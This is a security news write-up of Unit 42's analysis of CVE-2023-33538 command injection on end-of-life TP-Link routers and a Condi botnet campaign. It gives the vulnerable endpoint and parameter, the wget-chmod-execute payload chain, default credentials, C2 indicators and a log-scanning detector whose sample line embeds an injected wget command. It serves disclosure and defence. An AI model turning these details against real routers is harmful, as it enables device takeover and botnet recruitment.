Attackers are actively scanning for CVE-2023-33538 on legacy TP-Link Wi-Fi routers and deploying Mirai-variant malware via automated probes. Yet, Unit 42 researchers found that in-the-wild exploit attempts contain critical errors that cause them to fail, even as the underlying vulnerability remains fully exploitable.
Palo Alto Networks’ Unit 42 threat intelligence team has released an in-depth technical analysis revealing active, large-scale exploitation attempts targeting CVE-2023-33538, a high-severity command injection vulnerability affecting several end-of-life TP-Link router models.
The vulnerability, carrying a CVSS score of 8.8, was first publicly disclosed in June 2023 and was officially added to the Cybersecurity and Infrastructure Security Agency’s (CISA) Known Exploited Vulnerabilities (KEV) Catalog in June 2025.
Despite the flaws in the observed attack code, researchers confirm the vulnerability is real and poses a serious risk to millions of unpatched IoT devices still running default credentials.
Affected Devices and the Vulnerability
CVE-2023-33538 affects the following end-of-life TP-Link router models with no available vendor patches:
- TL-WR940N v2 and v4
- TL-WR740N v1 and v2
- TL-WR841N v8 and v10
The flaw resides in the /userRpm/WlanNetworkRpm web management endpoint. Specifically, the router’s httpd binary fails to sanitize the ssid1 parameter before passing it to a shell command iwconfig %s essid %s executed via execve("/bin/sh").
This allows an authenticated attacker to inject arbitrary operating system commands through a crafted HTTP GET request to the router’s web interface, potentially achieving full device compromise.
Unit 42’s telemetry detected mass exploitation attempts around the time of the CISA KEV listing, using HTTP GET requests with Basic Authentication encoded in Base64 (admin:admin → YWRtaW46YWRtaW4=).
The observed payloads attempted to: download an ARM ELF binary named arm7 from IP 51.38.137[.]113 using wget, grant it full permissions via chmod 777, and execute it with the parameter tplink.
However, the attack code contained a critical error: threat actors were targeting the ssid parameter instead of the correct vulnerable parameter ssid1.
This single mistake would cause all observed exploitation attempts to fail. Furthermore, the firmware’s limited BusyBox environment does not include common utilities like wget, curl, or vim, meaning even a correctly targeted attack would struggle to download and execute the payload as intended.
Unit 42 confirmed these findings through full firmware emulation of the TP-Link TL-WR940N V4 using the open-source firmware-analysis-toolkit, reverse engineering the httpd binary to trace the complete execution path from the HTTP request through HTTP_Handler() → wlanNetworkSave() → parseWlanParams() → wirelessConfigUpdate() → executeFormatCmd() → execve("/bin/sh").
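The request shape described above (a GET to /userRpm/WlanNetworkRpm with shell metacharacters in ssid or ssid1, sent with the default admin:admin Basic credentials) can be flagged from web-server logs. The following detector is an added example, not code from the Unit 42 report or from TP-Link; the log line format and the sample lines are constructed for illustration.

```python
import base64
import re
from urllib.parse import parse_qs, urlsplit

# ssid1 is the injectable parameter; ssid is what the observed (failing) probes
# targeted. Both are watched so misfired attempts are visible too.
WATCHED_PARAMS = ("ssid", "ssid1")
VULN_PATH = "/userRpm/WlanNetworkRpm"
# Characters that let a value escape the "iwconfig %s essid %s" shell command.
SHELL_META = re.compile(r"[;|&`$\n]")
# Basic header for the default admin:admin credentials (YWRtaW46YWRtaW4=).
DEFAULT_BASIC = "Basic " + base64.b64encode(b"admin:admin").decode()

# Constructed sample log lines, assumed format: client, method, "URL", "Authorization".
SAMPLE_LOG = [
    '198.51.100.7 GET "/userRpm/WlanNetworkRpm?ssid=a;wget%20http://example.invalid/arm7" "Basic YWRtaW46YWRtaW4="',
    '198.51.100.8 GET "/userRpm/WlanNetworkRpm?ssid1=HomeNet&channel=6" "Basic YWRtaW46YWRtaW4="',
    '198.51.100.9 GET "/userRpm/WlanNetworkRpm?ssid1=x%60id%60" "Basic c29tZXVzZXI6c2VjcmV0"',
    '198.51.100.10 GET "/userRpm/StatusRpm" ""',
]

LINE_RE = re.compile(r'^(\S+) (\S+) "([^"]*)" "([^"]*)"$')


def analyse(line):
    """Return findings for one log line, or None if the line is not notable."""
    m = LINE_RE.match(line)
    if not m:
        return None
    src, _method, url, auth = m.groups()
    parts = urlsplit(url)
    if parts.path != VULN_PATH:
        return None
    findings = {"src": src, "injection": [], "default_creds": auth == DEFAULT_BASIC}
    # parse_qs percent-decodes values, so %60 becomes a backtick before matching.
    qs = parse_qs(parts.query, keep_blank_values=True)
    for name in WATCHED_PARAMS:
        if any(SHELL_META.search(v) for v in qs.get(name, [])):
            findings["injection"].append(name)
    return findings if findings["injection"] or findings["default_creds"] else None


def scan(lines):
    """Run analyse() over a log and keep only the lines that produced findings."""
    return [f for f in map(analyse, lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit with an empty injection list but default_creds set still matters: it shows the default password is accepted by a device that cannot be patched.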
The Condi Botnet Connection
The arm7 binary recovered from the campaign is identified as a Condi IoT botnet variant, a Mirai-like malware family previously linked to DDoS campaigns.
The binary communicates with a command-and-control (C2) server at 51.38.137[.]113, which is also associated with the malicious domain cnc.vietdediserver[.]shop.
Once deployed, the infected device acts as a web server on a randomly assigned TCP port (1024–65535), serving fresh malware binaries targeting eight different CPU architectures, including MIPS, ARM, ARM6, ARM7, SH4, and x86_64.
The botnet uses a structured command protocol. Key command sequences include:
- 0x99 0x66 0x33 – Heartbeat response to C2
- 0x33 0x66 0x99 – HTTP server status check
- 0x33 0x66 0x66 – HTTP server starts on a random port
- 0x66 0x66 0x99 – Lockdown/termination preparation flag
Authentication Is the Critical Barrier
A key finding from Unit 42’s firmware emulation is that CVE-2023-33538 requires prior authentication to the router’s web management panel, a detail absent from the original vulnerability report.
The web panel’s login mechanism generates a session token via a PCSubWin() JavaScript function, which creates an authorization cookie by combining the username with the MD5 hash of the password and encoding the result in Base64. The session token is sufficiently random to prevent brute-forcing, meaning attackers must possess valid credentials.
This is where the default credential problem becomes the true threat vector. The default web panel credentials admin:admin are well-known and widely used across millions of deployed TP-Link routers.
An attacker using these credentials can gain authenticated access, inject commands into ssid1, trigger a reboot for denial-of-service, or overwrite the /etc/rc.d/rcS boot script to achieve persistent code execution across reboots.
Mitigation and Recommended Actions
TP-Link has confirmed that no patches will be issued for the affected end-of-life devices and recommends immediate hardware replacement. Organizations and home users still operating these models should take the following steps:
- Replace immediately with supported, actively patched hardware
- Change default credentials; never use admin:admin on any network device
- Disable remote web management access from untrusted networks
- Monitor for anomalous traffic to/from known C2 IPs: 51.38.137[.]113, bot.ddosvps[.]cc
- Block known malicious domains: cnc.vietdediserver[.]shop
Palo Alto Networks customers are protected through Advanced Threat Prevention, Advanced URL Filtering, Advanced DNS Security, Advanced WildFire, and Cortex Xpanse, which provides full visibility of exposed TP-Link routers across customer networks.
The Device Security platform can identify specific devices vulnerable to CVE-2023-33538 and alert on anomalous behavioral patterns.
Indicators of Compromise (IoCs)
| Type | Value |
|---|---|
| Malicious binary (arm7) | 7bbb21fec19512d932b7a92652ed0c8f0fedea89f34b9d6f267cf39de0eb9b20 |
| Malicious binary (arm) | 3fbd2a2e82ceb5e91eadbad02cb45ac618324da9b1895d81ebe7de765dca30e7 |
| Malicious binary (mips) | 534b654531a6a540a144da9545ee343e1046f843d7de4c1091b46c3ee66a508b |
| C2 Server IP | 51.38.137[.]113 |
| C2 Domain | cnc.vietdediserver[.]shop |
| Malware host | bot.ddosvps[.]cc |
This campaign illustrates a pattern increasingly observed across the IoT threat landscape: mass automated scanning with imprecise exploit code.
While the specific attacks seen in the wild would fail due to incorrect parameter targeting and the absence of wget in the firmware, the underlying vulnerability is fully functional under real-world conditions where attackers use correct parameters and authenticated access.
The persistence of default credentials across billions of deployed IoT devices means that even “limited” vulnerabilities like CVE-2023-33538, which require authentication, remain practical, high-value attack vectors for botnet operators.
The CVE-2023-33538 campaign also overlaps with a broader pattern of TP-Link devices being actively targeted. Forescout researchers separately disclosed two new TP-Link vulnerabilities, CVE-2025-7850 and CVE-2025-7851, in late 2025, involving OS command injection via WireGuard VPN settings and unauthorized root access through residual debug code.
This trajectory signals that legacy and current-generation TP-Link hardware will remain high-priority targets for botnet operators and state-sponsored threat actors alike.
FAQ
Q1: What is CVE-2023-33538?
A high-severity (CVSS 8.8) command injection vulnerability in end-of-life TP-Link routers (TL-WR940N, TL-WR740N, TL-WR841N) that allows authenticated attackers to execute arbitrary OS commands via the unsanitized ssid1 parameter in the web management interface.
Q2: Are the active exploit attempts against CVE-2023-33538 successful?
No, observed attacks use the wrong parameter (ssid instead of ssid1) and rely on wget, which is absent in the firmware’s limited BusyBox environment, making all current in-the-wild attempts fail despite the real underlying vulnerability.
Q3: Is there a patch available for CVE-2023-33538?
No, TP-Link has confirmed that all affected models are end-of-life and no security patches will be released; users must replace these devices with supported hardware immediately.
Q4: What malware is being deployed through CVE-2023-33538 exploitation attempts?
Attackers are attempting to deploy a Condi IoT botnet variant (Mirai-like), specifically the arm7 ELF binary, which establishes C2 communications with 51.38.137[.]113 and recruits infected routers into a DDoS-capable botnet serving multi-architecture payloads.